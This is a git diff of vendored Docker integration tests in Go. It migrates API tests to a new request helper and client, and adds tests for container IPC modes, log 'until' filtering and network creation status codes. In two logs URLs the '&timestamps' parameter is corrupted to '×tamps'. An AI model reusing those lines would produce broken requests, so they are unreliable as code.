"Mounts")}, } @@ -105,20 +107,16 @@ func (s *DockerSuite) TestInspectAPIContainerVolumeDriver(c *check.C) { func (s *DockerSuite) TestInspectAPIImageResponse(c *check.C) { dockerCmd(c, "tag", "busybox:latest", "busybox:mytag") + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() - endpoint := "/images/busybox/json" - status, body, err := sockRequest("GET", endpoint, nil) - + imageJSON, _, err := cli.ImageInspectWithRaw(context.Background(), "busybox") c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusOK) - var imageJSON types.ImageInspect - err = json.Unmarshal(body, &imageJSON) - c.Assert(err, checker.IsNil, check.Commentf("Unable to unmarshal body for latest version")) c.Assert(imageJSON.RepoTags, checker.HasLen, 2) - - c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:latest"), checker.Equals, true) - c.Assert(stringutils.InSlice(imageJSON.RepoTags, "busybox:mytag"), checker.Equals, true) + assert.Check(c, is.Contains(imageJSON.RepoTags, "busybox:latest")) + assert.Check(c, is.Contains(imageJSON.RepoTags, "busybox:mytag")) } // #17131, #17139, #17173 diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go deleted file mode 100644 index f49a139c28..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go +++ /dev/null @@ -1,35 +0,0 @@ -// +build !windows - -package main - -import ( - "encoding/json" - "fmt" - "net/http" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// #16665 -func (s *DockerSuite) TestInspectAPICpusetInConfigPre120(c *check.C) { - testRequires(c, DaemonIsLinux) - testRequires(c, cgroupCpuset) - - name := "cpusetinconfig-pre120" - dockerCmd(c, "run", "--name", name, "--cpuset-cpus", "0", "busybox", "true") - - status, body, err := sockRequest("GET", 
fmt.Sprintf("/v1.19/containers/%s/json", name), nil) - c.Assert(status, check.Equals, http.StatusOK) - c.Assert(err, check.IsNil) - - var inspectJSON map[string]interface{} - err = json.Unmarshal(body, &inspectJSON) - c.Assert(err, checker.IsNil, check.Commentf("unable to unmarshal body for version 1.19")) - - config, ok := inspectJSON["Config"] - c.Assert(ok, checker.True, check.Commentf("Unable to find 'Config'")) - cfg := config.(map[string]interface{}) - _, ok = cfg["Cpuset"] - c.Assert(ok, checker.True, check.Commentf("API version 1.19 expected to include Cpuset in 'Config'")) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go new file mode 100644 index 0000000000..886ff88d20 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go @@ -0,0 +1,213 @@ +// build +linux +package main + +import ( + "bufio" + "context" + "fmt" + "io/ioutil" + "os" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/go-check/check" +) + +/* testIpcCheckDevExists checks whether a given mount (identified by its + * major:minor pair from /proc/self/mountinfo) exists on the host system. 
+ * + * The format of /proc/self/mountinfo is like: + * + * 29 23 0:24 / /dev/shm rw,nosuid,nodev shared:4 - tmpfs tmpfs rw + * ^^^^\ + * - this is the minor:major we look for + */ +func testIpcCheckDevExists(mm string) (bool, error) { + f, err := os.Open("/proc/self/mountinfo") + if err != nil { + return false, err + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + fields := strings.Fields(s.Text()) + if len(fields) < 7 { + continue + } + if fields[2] == mm { + return true, nil + } + } + + return false, s.Err() +} + +// testIpcNonePrivateShareable is a helper function to test "none", +// "private" and "shareable" modes. +func testIpcNonePrivateShareable(c *check.C, mode string, mustBeMounted bool, mustBeShared bool) { + cfg := container.Config{ + Image: "busybox", + Cmd: []string{"top"}, + } + hostCfg := container.HostConfig{ + IpcMode: container.IpcMode(mode), + } + ctx := context.Background() + + client := testEnv.APIClient() + + resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "") + c.Assert(err, checker.IsNil) + c.Assert(len(resp.Warnings), checker.Equals, 0) + + err = client.ContainerStart(ctx, resp.ID, types.ContainerStartOptions{}) + c.Assert(err, checker.IsNil) + + // get major:minor pair for /dev/shm from container's /proc/self/mountinfo + cmd := "awk '($5 == \"/dev/shm\") {printf $3}' /proc/self/mountinfo" + mm := cli.DockerCmd(c, "exec", "-i", resp.ID, "sh", "-c", cmd).Combined() + if !mustBeMounted { + c.Assert(mm, checker.Equals, "") + // no more checks to perform + return + } + c.Assert(mm, checker.Matches, "^[0-9]+:[0-9]+$") + + shared, err := testIpcCheckDevExists(mm) + c.Assert(err, checker.IsNil) + c.Logf("[testIpcPrivateShareable] ipcmode: %v, ipcdev: %v, shared: %v, mustBeShared: %v\n", mode, mm, shared, mustBeShared) + c.Assert(shared, checker.Equals, mustBeShared) +} + +/* TestAPIIpcModeNone checks the container "none" IPC mode + * (--ipc none) works as expected. 
It makes sure there is no + * /dev/shm mount inside the container. + */ +func (s *DockerSuite) TestAPIIpcModeNone(c *check.C) { + testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.32")) + testIpcNonePrivateShareable(c, "none", false, false) +} + +/* TestAPIIpcModePrivate checks the container private IPC mode + * (--ipc private) works as expected. It gets the minor:major pair + * of /dev/shm mount from the container, and makes sure there is no + * such pair on the host. + */ +func (s *DockerSuite) TestAPIIpcModePrivate(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + testIpcNonePrivateShareable(c, "private", true, false) +} + +/* TestAPIIpcModeShareable checks the container shareable IPC mode + * (--ipc shareable) works as expected. It gets the minor:major pair + * of /dev/shm mount from the container, and makes sure such pair + * also exists on the host. + */ +func (s *DockerSuite) TestAPIIpcModeShareable(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + testIpcNonePrivateShareable(c, "shareable", true, true) +} + +// testIpcContainer is a helper function to test --ipc container:NNN mode in various scenarios +func testIpcContainer(s *DockerSuite, c *check.C, donorMode string, mustWork bool) { + cfg := container.Config{ + Image: "busybox", + Cmd: []string{"top"}, + } + hostCfg := container.HostConfig{ + IpcMode: container.IpcMode(donorMode), + } + ctx := context.Background() + + client := testEnv.APIClient() + + // create and start the "donor" container + resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "") + c.Assert(err, checker.IsNil) + c.Assert(len(resp.Warnings), checker.Equals, 0) + name1 := resp.ID + + err = client.ContainerStart(ctx, name1, types.ContainerStartOptions{}) + c.Assert(err, checker.IsNil) + + // create and start the second container + hostCfg.IpcMode = container.IpcMode("container:" + name1) + resp, err = client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "") + c.Assert(err, checker.IsNil) + 
c.Assert(len(resp.Warnings), checker.Equals, 0) + name2 := resp.ID + + err = client.ContainerStart(ctx, name2, types.ContainerStartOptions{}) + if !mustWork { + // start should fail with a specific error + c.Assert(err, checker.NotNil) + c.Assert(fmt.Sprintf("%v", err), checker.Contains, "non-shareable IPC") + // no more checks to perform here + return + } + + // start should succeed + c.Assert(err, checker.IsNil) + + // check that IPC is shared + // 1. create a file in the first container + cli.DockerCmd(c, "exec", name1, "sh", "-c", "printf covfefe > /dev/shm/bar") + // 2. check it's the same file in the second one + out := cli.DockerCmd(c, "exec", "-i", name2, "cat", "/dev/shm/bar").Combined() + c.Assert(out, checker.Matches, "^covfefe$") +} + +/* TestAPIIpcModeShareableAndContainer checks that a container created with + * --ipc container:ID can use IPC of another shareable container. + */ +func (s *DockerSuite) TestAPIIpcModeShareableAndContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + testIpcContainer(s, c, "shareable", true) +} + +/* TestAPIIpcModePrivateAndContainer checks that a container created with + * --ipc container:ID can NOT use IPC of another private container. + */ +func (s *DockerSuite) TestAPIIpcModePrivateAndContainer(c *check.C) { + testRequires(c, DaemonIsLinux, MinimumAPIVersion("1.32")) + testIpcContainer(s, c, "private", false) +} + +/* TestAPIIpcModeHost checks that a container created with --ipc host + * can use IPC of the host system. 
+ */ +func (s *DockerSuite) TestAPIIpcModeHost(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace) + + cfg := container.Config{ + Image: "busybox", + Cmd: []string{"top"}, + } + hostCfg := container.HostConfig{ + IpcMode: container.IpcMode("host"), + } + ctx := context.Background() + + client := testEnv.APIClient() + resp, err := client.ContainerCreate(ctx, &cfg, &hostCfg, nil, "") + c.Assert(err, checker.IsNil) + c.Assert(len(resp.Warnings), checker.Equals, 0) + name := resp.ID + + err = client.ContainerStart(ctx, name, types.ContainerStartOptions{}) + c.Assert(err, checker.IsNil) + + // check that IPC is shared + // 1. create a file inside container + cli.DockerCmd(c, "exec", name, "sh", "-c", "printf covfefe > /dev/shm/."+name) + // 2. check it's the same on the host + bytes, err := ioutil.ReadFile("/dev/shm/." + name) + c.Assert(err, checker.IsNil) + c.Assert(string(bytes), checker.Matches, "^covfefe$") + // 3. clean up + cli.DockerCmd(c, "exec", name, "rm", "-f", "/dev/shm/."+name) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go index 2e8ffa9bdc..e809b46c2f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_logs_test.go @@ -3,12 +3,20 @@ package main import ( "bufio" "bytes" + "context" "fmt" + "io" + "io/ioutil" "net/http" + "strconv" "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/pkg/stdcopy" "github.com/go-check/check" ) @@ -19,34 +27,31 @@ func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) { type logOut struct { out string - res *http.Response err error } + chLog := make(chan logOut) + 
res, body, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1×tamps=1", id)) + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) go func() { - res, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1×tamps=1", id), nil, "") - if err != nil { - chLog <- logOut{"", nil, err} - return - } defer body.Close() out, err := bufio.NewReader(body).ReadString('\n') if err != nil { - chLog <- logOut{"", nil, err} + chLog <- logOut{"", err} return } - chLog <- logOut{strings.TrimSpace(out), res, err} + chLog <- logOut{strings.TrimSpace(out), err} }() select { case l := <-chLog: c.Assert(l.err, checker.IsNil) - c.Assert(l.res.StatusCode, checker.Equals, http.StatusOK) if !strings.HasSuffix(l.out, "hello") { c.Fatalf("expected log output to container 'hello', but it does not") } - case <-time.After(20 * time.Second): + case <-time.After(30 * time.Second): c.Fatal("timeout waiting for logs to exit") } } @@ -54,13 +59,13 @@ func (s *DockerSuite) TestLogsAPIWithStdout(c *check.C) { func (s *DockerSuite) TestLogsAPINoStdoutNorStderr(c *check.C) { name := "logs_test" dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") - - status, body, err := sockRequest("GET", fmt.Sprintf("/containers/%s/logs", name), nil) - c.Assert(status, checker.Equals, http.StatusBadRequest) + cli, err := client.NewEnvClient() c.Assert(err, checker.IsNil) + defer cli.Close() + _, err = cli.ContainerLogs(context.Background(), name, types.ContainerLogsOptions{}) expected := "Bad parameters: you must choose at least one stream" - c.Assert(getErrorMessage(c, body), checker.Contains, expected) + c.Assert(err.Error(), checker.Contains, expected) } // Regression test for #12704 @@ -69,7 +74,7 @@ func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) { t0 := time.Now() dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "sleep", "10") - _, body, err := sockRequestRaw("GET", 
fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "") + _, body, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name)) t1 := time.Now() c.Assert(err, checker.IsNil) body.Close() @@ -81,7 +86,131 @@ func (s *DockerSuite) TestLogsAPIFollowEmptyOutput(c *check.C) { func (s *DockerSuite) TestLogsAPIContainerNotFound(c *check.C) { name := "nonExistentContainer" - resp, _, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name), bytes.NewBuffer(nil), "") + resp, _, err := request.Get(fmt.Sprintf("/containers/%s/logs?follow=1&stdout=1&stderr=1&tail=all", name)) c.Assert(err, checker.IsNil) c.Assert(resp.StatusCode, checker.Equals, http.StatusNotFound) } + +func (s *DockerSuite) TestLogsAPIUntilFutureFollow(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "logsuntilfuturefollow" + dockerCmd(c, "run", "-d", "--name", name, "busybox", "/bin/sh", "-c", "while true; do date +%s; sleep 1; done") + c.Assert(waitRun(name), checker.IsNil) + + untilSecs := 5 + untilDur, err := time.ParseDuration(fmt.Sprintf("%ds", untilSecs)) + c.Assert(err, checker.IsNil) + until := daemonTime(c).Add(untilDur) + + client, err := client.NewEnvClient() + if err != nil { + c.Fatal(err) + } + + cfg := types.ContainerLogsOptions{Until: until.Format(time.RFC3339Nano), Follow: true, ShowStdout: true, Timestamps: true} + reader, err := client.ContainerLogs(context.Background(), name, cfg) + c.Assert(err, checker.IsNil) + + type logOut struct { + out string + err error + } + + chLog := make(chan logOut) + + go func() { + bufReader := bufio.NewReader(reader) + defer reader.Close() + for i := 0; i < untilSecs; i++ { + out, _, err := bufReader.ReadLine() + if err != nil { + if err == io.EOF { + return + } + chLog <- logOut{"", err} + return + } + + chLog <- logOut{strings.TrimSpace(string(out)), err} + } + }() + + for i := 0; i < untilSecs; i++ { + select { + 
case l := <-chLog: + c.Assert(l.err, checker.IsNil) + i, err := strconv.ParseInt(strings.Split(l.out, " ")[1], 10, 64) + c.Assert(err, checker.IsNil) + c.Assert(time.Unix(i, 0).UnixNano(), checker.LessOrEqualThan, until.UnixNano()) + case <-time.After(20 * time.Second): + c.Fatal("timeout waiting for logs to exit") + } + } +} + +func (s *DockerSuite) TestLogsAPIUntil(c *check.C) { + testRequires(c, MinimumAPIVersion("1.34")) + name := "logsuntil" + dockerCmd(c, "run", "--name", name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do echo log$i; sleep 1; done") + + client, err := client.NewEnvClient() + if err != nil { + c.Fatal(err) + } + + extractBody := func(c *check.C, cfg types.ContainerLogsOptions) []string { + reader, err := client.ContainerLogs(context.Background(), name, cfg) + c.Assert(err, checker.IsNil) + + actualStdout := new(bytes.Buffer) + actualStderr := ioutil.Discard + _, err = stdcopy.StdCopy(actualStdout, actualStderr, reader) + c.Assert(err, checker.IsNil) + + return strings.Split(actualStdout.String(), "\n") + } + + // Get timestamp of second log line + allLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true}) + c.Assert(len(allLogs), checker.GreaterOrEqualThan, 3) + + t, err := time.Parse(time.RFC3339Nano, strings.Split(allLogs[1], " ")[0]) + c.Assert(err, checker.IsNil) + until := t.Format(time.RFC3339Nano) + + // Get logs until the timestamp of second line, i.e. 
first two lines + logs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true, Until: until}) + + // Ensure log lines after cut-off are excluded + logsString := strings.Join(logs, "\n") + c.Assert(logsString, checker.Not(checker.Contains), "log3", check.Commentf("unexpected log message returned, until=%v", until)) +} + +func (s *DockerSuite) TestLogsAPIUntilDefaultValue(c *check.C) { + name := "logsuntildefaultval" + dockerCmd(c, "run", "--name", name, "busybox", "/bin/sh", "-c", "for i in $(seq 1 3); do echo log$i; done") + + client, err := client.NewEnvClient() + if err != nil { + c.Fatal(err) + } + + extractBody := func(c *check.C, cfg types.ContainerLogsOptions) []string { + reader, err := client.ContainerLogs(context.Background(), name, cfg) + c.Assert(err, checker.IsNil) + + actualStdout := new(bytes.Buffer) + actualStderr := ioutil.Discard + _, err = stdcopy.StdCopy(actualStdout, actualStderr, reader) + c.Assert(err, checker.IsNil) + + return strings.Split(actualStdout.String(), "\n") + } + + // Get timestamp of second log line + allLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true}) + + // Test with default value specified and parameter omitted + defaultLogs := extractBody(c, types.ContainerLogsOptions{Timestamps: true, ShowStdout: true, Until: "0"}) + c.Assert(defaultLogs, checker.DeepEquals, allLogs) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go index 1cc66f0900..9c22cb7e3a 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_network_test.go @@ -11,7 +11,9 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/network" - "github.com/docker/docker/pkg/integration/checker" + 
"github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -34,7 +36,7 @@ func (s *DockerSuite) TestAPINetworkCreateDelete(c *check.C) { CheckDuplicate: true, }, } - id := createNetwork(c, config, true) + id := createNetwork(c, config, http.StatusCreated) c.Assert(isNetworkAvailable(c, name), checker.Equals, true) // delete the network and make sure it is deleted @@ -59,14 +61,25 @@ func (s *DockerSuite) TestAPINetworkCreateCheckDuplicate(c *check.C) { } // Creating a new network first - createNetwork(c, configOnCheck, true) + createNetwork(c, configOnCheck, http.StatusCreated) c.Assert(isNetworkAvailable(c, name), checker.Equals, true) // Creating another network with same name and CheckDuplicate must fail - createNetwork(c, configOnCheck, false) + isOlderAPI := versions.LessThan(testEnv.DaemonAPIVersion(), "1.34") + expectedStatus := http.StatusConflict + if isOlderAPI { + // In the early test code it uses bool value to represent + // whether createNetwork() is expected to fail or not. + // Therefore, we use negation to handle the same logic after + // the code was changed in https://github.com/moby/moby/pull/35030 + // -http.StatusCreated will also be checked as NOT equal to + // http.StatusCreated in createNetwork() function. 
+ expectedStatus = -http.StatusCreated + } + createNetwork(c, configOnCheck, expectedStatus) // Creating another network with same name and not CheckDuplicate must succeed - createNetwork(c, configNotCheck, true) + createNetwork(c, configNotCheck, http.StatusCreated) } func (s *DockerSuite) TestAPINetworkFilter(c *check.C) { @@ -75,7 +88,7 @@ func (s *DockerSuite) TestAPINetworkFilter(c *check.C) { c.Assert(nr.Name, checker.Equals, "bridge") } -func (s *DockerSuite) TestAPINetworkInspect(c *check.C) { +func (s *DockerSuite) TestAPINetworkInspectBridge(c *check.C) { testRequires(c, DaemonIsLinux) // Inspect default bridge network nr := getNetworkResource(c, "bridge") @@ -93,13 +106,15 @@ func (s *DockerSuite) TestAPINetworkInspect(c *check.C) { c.Assert(nr.Internal, checker.Equals, false) c.Assert(nr.EnableIPv6, checker.Equals, false) c.Assert(nr.IPAM.Driver, checker.Equals, "default") - c.Assert(len(nr.Containers), checker.Equals, 1) c.Assert(nr.Containers[containerID], checker.NotNil) ip, _, err := net.ParseCIDR(nr.Containers[containerID].IPv4Address) c.Assert(err, checker.IsNil) c.Assert(ip.String(), checker.Equals, containerIP) +} +func (s *DockerSuite) TestAPINetworkInspectUserDefinedNetwork(c *check.C) { + testRequires(c, DaemonIsLinux) // IPAM configuration inspect ipam := &network.IPAM{ Driver: "default", @@ -113,10 +128,10 @@ func (s *DockerSuite) TestAPINetworkInspect(c *check.C) { Options: map[string]string{"foo": "bar", "opts": "dopts"}, }, } - id0 := createNetwork(c, config, true) + id0 := createNetwork(c, config, http.StatusCreated) c.Assert(isNetworkAvailable(c, "br0"), checker.Equals, true) - nr = getNetworkResource(c, id0) + nr := getNetworkResource(c, id0) c.Assert(len(nr.IPAM.Config), checker.Equals, 1) c.Assert(nr.IPAM.Config[0].Subnet, checker.Equals, "172.28.0.0/16") c.Assert(nr.IPAM.Config[0].IPRange, checker.Equals, "172.28.5.0/24") @@ -136,7 +151,7 @@ func (s *DockerSuite) TestAPINetworkConnectDisconnect(c *check.C) { config := 
types.NetworkCreateRequest{ Name: name, } - id := createNetwork(c, config, true) + id := createNetwork(c, config, http.StatusCreated) nr := getNetworkResource(c, id) c.Assert(nr.Name, checker.Equals, name) c.Assert(nr.ID, checker.Equals, id) @@ -184,7 +199,7 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { IPAM: ipam0, }, } - id0 := createNetwork(c, config0, true) + id0 := createNetwork(c, config0, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test0"), checker.Equals, true) ipam1 := &network.IPAM{ @@ -199,7 +214,11 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { IPAM: ipam1, }, } - createNetwork(c, config1, false) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + createNetwork(c, config1, http.StatusInternalServerError) + } else { + createNetwork(c, config1, http.StatusForbidden) + } c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, false) ipam2 := &network.IPAM{ @@ -214,20 +233,20 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { IPAM: ipam2, }, } - createNetwork(c, config2, true) + createNetwork(c, config2, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test2"), checker.Equals, true) // remove test0 and retry to create test1 deleteNetwork(c, id0, true) - createNetwork(c, config1, true) + createNetwork(c, config1, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test1"), checker.Equals, true) // for networks w/o ipam specified, docker will choose proper non-overlapping subnets - createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test3"}, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test3"), checker.Equals, true) - createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test4"}, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test4"), checker.Equals, true) - createNetwork(c, 
types.NetworkCreateRequest{Name: "test5"}, true) + createNetwork(c, types.NetworkCreateRequest{Name: "test5"}, http.StatusCreated) c.Assert(isNetworkAvailable(c, "test5"), checker.Equals, true) for i := 1; i < 6; i++ { @@ -236,7 +255,7 @@ func (s *DockerSuite) TestAPINetworkIPAMMultipleBridgeNetworks(c *check.C) { } func (s *DockerSuite) TestAPICreateDeletePredefinedNetworks(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SwarmInactive) createDeletePredefinedNetwork(c, "bridge") createDeletePredefinedNetwork(c, "none") createDeletePredefinedNetwork(c, "host") @@ -250,18 +269,28 @@ func createDeletePredefinedNetwork(c *check.C, name string) { CheckDuplicate: true, }, } - shouldSucceed := false - createNetwork(c, config, shouldSucceed) - deleteNetwork(c, name, shouldSucceed) + expectedStatus := http.StatusForbidden + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.34") { + // In the early test code it uses bool value to represent + // whether createNetwork() is expected to fail or not. + // Therefore, we use negation to handle the same logic after + // the code was changed in https://github.com/moby/moby/pull/35030 + // -http.StatusCreated will also be checked as NOT equal to + // http.StatusCreated in createNetwork() function. 
+ expectedStatus = -http.StatusCreated + } + createNetwork(c, config, expectedStatus) + deleteNetwork(c, name, false) } func isNetworkAvailable(c *check.C, name string) bool { - status, body, err := sockRequest("GET", "/networks", nil) - c.Assert(status, checker.Equals, http.StatusOK) + resp, body, err := request.Get("/networks") c.Assert(err, checker.IsNil) + defer resp.Body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) - nJSON := []types.NetworkResource{} - err = json.Unmarshal(body, &nJSON) + var nJSON []types.NetworkResource + err = json.NewDecoder(body).Decode(&nJSON) c.Assert(err, checker.IsNil) for _, n := range nJSON { @@ -278,48 +307,59 @@ func getNetworkIDByName(c *check.C, name string) string { filterArgs = filters.NewArgs() ) filterArgs.Add("name", name) - filterJSON, err := filters.ToParam(filterArgs) + filterJSON, err := filters.ToJSON(filterArgs) c.Assert(err, checker.IsNil) v.Set("filters", filterJSON) - status, body, err := sockRequest("GET", "/networks?"+v.Encode(), nil) - c.Assert(status, checker.Equals, http.StatusOK) + resp, body, err := request.Get("/networks?" 
+ v.Encode()) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) c.Assert(err, checker.IsNil) - nJSON := []types.NetworkResource{} - err = json.Unmarshal(body, &nJSON) + var nJSON []types.NetworkResource + err = json.NewDecoder(body).Decode(&nJSON) c.Assert(err, checker.IsNil) - c.Assert(len(nJSON), checker.Equals, 1) + var res string + for _, n := range nJSON { + // Find exact match + if n.Name == name { + res = n.ID + } + } + c.Assert(res, checker.Not(checker.Equals), "") - return nJSON[0].ID + return res } func getNetworkResource(c *check.C, id string) *types.NetworkResource { - _, obj, err := sockRequest("GET", "/networks/"+id, nil) + _, obj, err := request.Get("/networks/" + id) c.Assert(err, checker.IsNil) nr := types.NetworkResource{} - err = json.Unmarshal(obj, &nr) + err = json.NewDecoder(obj).Decode(&nr) c.Assert(err, checker.IsNil) return &nr } -func createNetwork(c *check.C, config types.NetworkCreateRequest, shouldSucceed bool) string { - status, resp, err := sockRequest("POST", "/networks/create", config) - if !shouldSucceed { - c.Assert(status, checker.Not(checker.Equals), http.StatusCreated) - return "" - } - +func createNetwork(c *check.C, config types.NetworkCreateRequest, expectedStatusCode int) string { + resp, body, err := request.Post("/networks/create", request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + defer resp.Body.Close() - var nr types.NetworkCreateResponse - err = json.Unmarshal(resp, &nr) - c.Assert(err, checker.IsNil) + if expectedStatusCode >= 0 { + c.Assert(resp.StatusCode, checker.Equals, expectedStatusCode) + } else { + c.Assert(resp.StatusCode, checker.Not(checker.Equals), -expectedStatusCode) + } + + if expectedStatusCode == http.StatusCreated || expectedStatusCode < 0 { + var nr types.NetworkCreateResponse + err = json.NewDecoder(body).Decode(&nr) + c.Assert(err, checker.IsNil) - return nr.ID + return nr.ID + } + return "" } func connectNetwork(c *check.C, 
nid, cid string) { @@ -327,8 +367,8 @@ func connectNetwork(c *check.C, nid, cid string) { Container: cid, } - status, _, err := sockRequest("POST", "/networks/"+nid+"/connect", config) - c.Assert(status, checker.Equals, http.StatusOK) + resp, _, err := request.Post("/networks/"+nid+"/connect", request.JSONBody(config)) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) c.Assert(err, checker.IsNil) } @@ -337,17 +377,18 @@ func disconnectNetwork(c *check.C, nid, cid string) { Container: cid, } - status, _, err := sockRequest("POST", "/networks/"+nid+"/disconnect", config) - c.Assert(status, checker.Equals, http.StatusOK) + resp, _, err := request.Post("/networks/"+nid+"/disconnect", request.JSONBody(config)) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) c.Assert(err, checker.IsNil) } func deleteNetwork(c *check.C, id string, shouldSucceed bool) { - status, _, err := sockRequest("DELETE", "/networks/"+id, nil) + resp, _, err := request.Delete("/networks/" + id) + c.Assert(err, checker.IsNil) + defer resp.Body.Close() if !shouldSucceed { - c.Assert(status, checker.Not(checker.Equals), http.StatusOK) + c.Assert(resp.StatusCode, checker.Not(checker.Equals), http.StatusOK) return } - c.Assert(status, checker.Equals, http.StatusNoContent) - c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusNoContent) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go deleted file mode 100644 index daf1b05d2e..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go +++ /dev/null @@ -1,44 +0,0 @@ -package main - -import ( - "net/http" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestResizeAPIResponse(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cleanedContainerID := strings.TrimSpace(out) - - 
endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40" - status, _, err := sockRequest("POST", endpoint, nil) - c.Assert(status, check.Equals, http.StatusOK) - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestResizeAPIHeightWidthNoInt(c *check.C) { - out, _ := runSleepingContainer(c, "-d") - cleanedContainerID := strings.TrimSpace(out) - - endpoint := "/containers/" + cleanedContainerID + "/resize?h=foo&w=bar" - status, _, err := sockRequest("POST", endpoint, nil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - c.Assert(err, check.IsNil) -} - -func (s *DockerSuite) TestResizeAPIResponseWhenContainerNotStarted(c *check.C) { - out, _ := dockerCmd(c, "run", "-d", "busybox", "true") - cleanedContainerID := strings.TrimSpace(out) - - // make sure the exited container is not running - dockerCmd(c, "wait", cleanedContainerID) - - endpoint := "/containers/" + cleanedContainerID + "/resize?h=40&w=40" - status, body, err := sockRequest("POST", endpoint, nil) - c.Assert(status, check.Equals, http.StatusInternalServerError) - c.Assert(err, check.IsNil) - - c.Assert(getErrorMessage(c, body), checker.Contains, "is not running", check.Commentf("resize should fail with message 'Container is not running'")) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go deleted file mode 100644 index 15a21e579f..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go +++ /dev/null @@ -1,39 +0,0 @@ -// +build !windows - -package main - -import ( - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" - 